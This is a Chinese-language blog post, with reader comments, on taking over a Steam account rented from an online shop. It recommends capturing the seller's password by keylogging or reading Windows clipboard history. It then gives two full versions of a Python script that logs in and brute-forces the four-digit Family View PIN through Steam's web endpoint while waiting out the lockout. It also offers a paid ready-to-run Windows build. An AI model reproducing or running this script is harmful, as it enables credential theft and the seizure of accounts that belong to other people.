Steam家庭监护爆破
浏览 5733 | 评论 55 | 字数 10884
卖女孩的小火柴
2020年01月04日
  • 我去淘宝买了一个游戏的Steam离线版,实际上就是给你个账户下载安装后以离线模式运行,配合上Steam账户管理器玩起来感觉还是很不错的
    但我总是对客户端上的 家庭监护 标志耿耿于怀...

    怎么搞到账户密码?

    对很多店来说,他们不愿意把账户密码给你,更愿意直接远程,然后输入账户和密码,全部设置好后给设置为离线模式。
    这个其实很好搞,Steam本身保护并不是非常到位,你可以采取记录键盘的方式记录下输入的密码,如果遇到和我一样偷懒复制粘贴的店家,你只需要借助Win自带的剪贴板历史(Win徽标+V)打开后就可以看到复制来的账户和密码啦~~~

    怎么搞到家庭监护的Key?

    Steam客户端和Steam网页都会被监护影响,经过测试,无论是客户端还是网页,都是输错5次暂停3分钟输入,那当然选择网页折腾啦~~
    抓包的过程也很简单,需要注意的是,有个参数是附在网页中传递来的,需要取出来,然后遇到错误暂停3分钟继续咯。。。

    rsa.js.zip
    下面是脚本:

    # !/user/bin/env python
    # -*- coding:utf-8 -*- 
    # time: 2018/9/6--19:24
    __author__ = 'Henry'
    # I use his login code ,thx him
    __sauthor__ = 'zponds'
    
    '''
    Steam login (RSA)
    URL:https://store.steampowered.com/login/
    '''
    
    import requests
    import time
    import re
    import execjs
    import json
    
    def steam_login():
        req = requests.session()
        headers = {
            'Referer': 'https://store.steampowered.com/login/',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
    Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
        }
        url = 'https://store.steampowered.com/login/getrsakey/'
        data = {
            'donotcache': str(int(time.time() * 1000)),
            'username': user
        }
        html = req.post(url, data=data, headers=headers).json()
        pub_mod = html.get('publickey_mod')
        pub_exp = html.get('publickey_exp')
        timestamp = html.get('timestamp')
    
        with open('rsa.js', encoding='utf-8') as f:
            jsdata = f.read()
        passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
        print(passencrypt)
        # login
        url = 'https://store.steampowered.com/login/dologin/'
        data = {
            'donotcache': str(int(time.time() * 1000)),
            'username': user,
            'password': passencrypt,
            'twofactorcode': '',
            'emailauth': '',
            'loginfriendlyname': '',
            'captchagid': '-1',
            'captcha_text': '',
            'emailsteamid': '',
            'rsatimestamp': timestamp,
            'remember_login': 'false',
        }
        html = req.post(url, data=data, headers=headers).json()
        if html.get('emailauth_needed') == True:
            print('Login requires your email verification code')
            emailid = html.get('emailsteamid')
            email = input('Please enter your email verification code:')
            # login again
            data['emailauth'] = email
            data['emailsteamid'] = emailid
            html = req.post(url, data=data, headers=headers).json()
            print(html)
            if html.get('login_complete') == True and html.get('success') == True:
                print('logining...')
                url_store = 'https://store.steampowered.com/'
                html = req.get(url_store, headers=headers).text
                username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
                print('[Success!Username:' + username + ']')
                r = req.get('https://store.steampowered.com/parental/blocked')
                if '/parental/unlock' in r.text:
                    print('The account has a family view')
                    sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                    success = False
                    start = input('PIN from:')
                    start_time = int(time.time())
                    for pin in range(int(start) - 1, 10000):
                        flag = True
                        while flag:
                            # 取出sessionID
                            pin_str = str(pin)
                            while len(pin_str) < 4:
                                pin_str = "0" + pin_str
                            data = {
                                'pin': pin_str,
                                'sessionid': sessionID
                            }
                            try:
                                r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
                                             headers=headers)
                                r_json = json.loads(r.text)
                                if r_json['success'] == False:
                                    if 'wait a while' in r_json['error_message']:
                                        print('Sleep...')
                                        time.sleep(180)
                                        r = req.get('https://store.steampowered.com/parental/blocked')
                                        sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                                    else:
                                        flag = False
                                        print("PIN: %s: %s" % (pin_str, r_json['error_message']))
                                else:
                                    print("PIN: %s: SUCCESS!" % pin_str)
                                    end_time = int(time.time())
                                    print("Time: %ds" % (end_time-start_time))
                                    success = True
                            except BaseException as e:
                                print('Error...')
                                time.sleep(10)
                            if success:
                                exit(0)
                    else:
                        print('The account does not have a family view')
            else:
                print('login fail...')
        elif html.get('success') == False and html.get('message') != '':
            print(html.get('message'))
            print('login fail...')
    
    
    if __name__ == '__main__':
        user = input('account:')
        password = input('password:')
        steam_login()

    0000-9999 Pin 3分钟可以尝试5次,运气再差也就2-3天的事情吧~找台服务器放着就好啦~

    搞到KEY之后?

    解除掉家庭监护就可以添加家庭共享啦~
    接下来这个账户的使用权就属于你啦~

    什么?不会运行Python?

    没有关系,我已经准备好了一个WINDOWS开箱即用的版本了!下载后可以直接使用!
    同时附赠一次指导!

    2020年3月18日更新

    • 掉线后会自动尝试重新登录
    • 结束后会要求输入EXIT以退出
    • BUG修复
    • 当然,编译的WINDOWS文件也更新了
    # !/user/bin/env python
    # -*- coding:utf-8 -*- 
    # time: 2018/9/6--19:24
    __author__ = 'Henry'
    # I use his login code ,thx him
    __sauthor__ = 'zponds'
    
    '''
    Steam login (RSA)
    URL:https://store.steampowered.com/login/
    '''
    
    import requests
    import time
    import re
    import execjs
    import json
    
    def steam_login(open_start=-1):
        req = requests.session()
        headers = {
            'Referer': 'https://store.steampowered.com/login/',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
    Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
        }
        url = 'https://store.steampowered.com/login/getrsakey/'
        data = {
            'donotcache': str(int(time.time() * 1000)),
            'username': user
        }
        html = req.post(url, data=data, headers=headers).json()
        pub_mod = html.get('publickey_mod')
        pub_exp = html.get('publickey_exp')
        timestamp = html.get('timestamp')
    
        with open('rsa.js', encoding='utf-8') as f:
            jsdata = f.read()
        passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
        # print(passencrypt)
        # login
        url = 'https://store.steampowered.com/login/dologin/'
        data = {
            'donotcache': str(int(time.time() * 1000)),
            'username': user,
            'password': passencrypt,
            'twofactorcode': '',
            'emailauth': '',
            'loginfriendlyname': '',
            'captchagid': '-1',
            'captcha_text': '',
            'emailsteamid': '',
            'rsatimestamp': timestamp,
            'remember_login': 'true',
        }
        html = req.post(url, data=data, headers=headers).json()
        if html.get('emailauth_needed') == True:
            print('登陆需要邮箱验证码...')
            emailid = html.get('emailsteamid')
            email = input('请输入验证码:')
            # login again
            data['emailauth'] = email
            data['emailsteamid'] = emailid
            html = req.post(url, data=data, headers=headers).json()
            # print(html)
        if html.get('login_complete') == True and html.get('success') == True:
            print('logining...')
            url_store = 'https://store.steampowered.com/'
            html = req.get(url_store, headers=headers).text
            username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
            print('[登陆成功!用户名:' + username + ']')
            r = req.get('https://store.steampowered.com/parental/blocked')
            if '/parental/unlock' in r.text:
                print('这个账户存在家庭监护')
                sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                success = False
                if open_start == -1:
                    start = input('从多少开始PIN(第一次运行请从0000开始):')
                else:
                    start = open_start
                start_time = int(time.time())
                for pin in range(int(start) - 1, 10000):
                    flag = True
                    while flag:
                        # 取出sessionID
                        pin_str = str(pin)
                        while len(pin_str) < 4:
                            pin_str = "0" + pin_str
                        data = {
                            'pin': pin_str,
                            'sessionid': sessionID
                        }
                        try:
                            r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
                                         headers=headers)
                            if len(r.text) > 2000:
                                return steam_login(pin)
                            r_json = json.loads(r.text)
                            if r_json['success'] == False:
                                if 'wait a while'  in r_json['error_message'] or '错误尝试' in r_json['error_message']:
                                    print('等待中...')
                                    time.sleep(180)
                                    r = req.get('https://store.steampowered.com/parental/blocked')
                                    sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                                else:
                                    flag = False
                                    print("PIN: %s: %s" % (pin_str, r_json['error_message']))
                            else:
                                print("PIN: %s: 成功!" % pin_str)
                                end_time = int(time.time())
                                print("Time: %ds" % (end_time-start_time))
                                success = True
                        except BaseException as e:
                            print('Error...')
                            time.sleep(10)
                        if success:
                            return
            else:
                print('您的账户不存在家庭监护!')
        else:
            print(html.get('message'))
            print('登陆失败...')
    
    
    if __name__ == '__main__':
        user = input('账户名:')
        password = input('密码:')
        print('注意,跑PIN耗时可能非常长...可能长达两天...')
        steam_login()
        end = input('输入 EXIT 以退出...')
        while end != 'EXIT':
            end = input('输入 EXIT 以退出...')

    支付宝支付
    价格: 3.00 元
    温馨提示:如需其他付款方式或有其他疑问,请加Q: 1005468403 付费可读
    本文作者:卖女孩的小火柴
    本文链接:https://www.shinenet.cn/archives/82.html
    最后修改时间:2020-03-18 16:26:38
    本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!
    如果文章对您有帮助,不妨打赏杯可乐?微信-赞赏码
    评论
    如果可能,请填写真实邮箱,有回复会送至邮箱。请不要水评论,谢谢。
    textsms
    支持 Markdown 语法
    email
    link
    评论列表
    已有 55 条评论
    xxxxmw
    2020-09-01 17:49
    Traceback (most recent call last):
    File "C:/Users/10564/Desktop/untitled/111.py", line 128, in <module>steam_login()File "C:/Users/10564/Desktop/untitled/111.py", line 36, in steam_loginwith open('rsa.js', encoding='utf-8') as f:FileNotFoundError: [Errno 2] No such file or directory: 'rsa.js'
    很好奇这个rsa .js什么鬼
    xxxxmw
    2020-09-01 18:02
    @卖女孩的小火柴 大佬这个rsa.js干啥的??
    2020-09-01 18:04
    @xxxxmw 用来生成steam登录时候的各种值,steam登录不是明文post
    xxxxmw
    2020-09-01 22:20
    @卖女孩的小火柴 哈哈,谢谢大佬解惑
    YSN
    2020-08-04 00:06
    有时候会长时间没有反应,要手动按回车才会继续破解
    2020-08-04 00:08
    @YSN 是的,windows的终端问题,存在很久了,Linux下就没这毛病
    風也很溫柔
    2020-07-31 08:43
    大佬能QQ远程给我弄一下吗?我不懂哎
    2020-07-31 09:03
    @風也很溫柔 QQ联系我吧 1005468403
    无恙丶
    2020-06-29 15:50
    登陆失败·······然后就说退出,这个怎么处理?
    无恙丶
    2020-06-29 15:52
    @无恙丶 可以了。谢谢。看错了。
    欧阳逸龙
    2020-06-10 14:22
    不在网页上可以吗
    2020-06-10 14:23
    @欧阳逸龙 不行,不会整Steam的客户端登录算法
    欧阳逸龙
    2020-06-10 14:27
    @卖女孩的小火柴 随便一个浏览器都可以吗
    2020-06-10 14:28
    @欧阳逸龙 和浏览器有什么关系...
    这个是直接做了前端逆向,模拟了浏览器
    欧阳逸龙
    2020-06-10 14:31
    @欧阳逸龙 OK,加QQ同意一下
    2020-06-10 14:36
    @欧阳逸龙 你号被TX风险了,同意不了
    换个号加吧